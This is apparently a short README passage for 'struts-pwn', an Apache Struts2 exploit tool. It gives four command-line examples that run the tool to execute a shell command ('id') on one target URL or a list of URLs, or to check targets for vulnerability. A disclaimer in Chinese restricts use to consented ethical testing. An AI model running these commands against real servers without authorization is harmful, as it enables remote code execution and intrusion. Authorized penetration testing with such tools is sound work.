python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'
python struts-pwn.py --list 'urls.txt' -c 'id'
python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'
python struts-pwn.py --check --list 'urls.txt'
本项目仅用于教育和道德测试目的。未经事先相互同意,使用 struts-pwn 攻击目标是违法的。最终用户有责任遵守所有适用的地方、州和联邦法律。开发者不承担任何责任,亦不对因使用本程序而导致的任何滥用或损害负责。
本项目采用 MIT 许可证。
Mazin Ahmed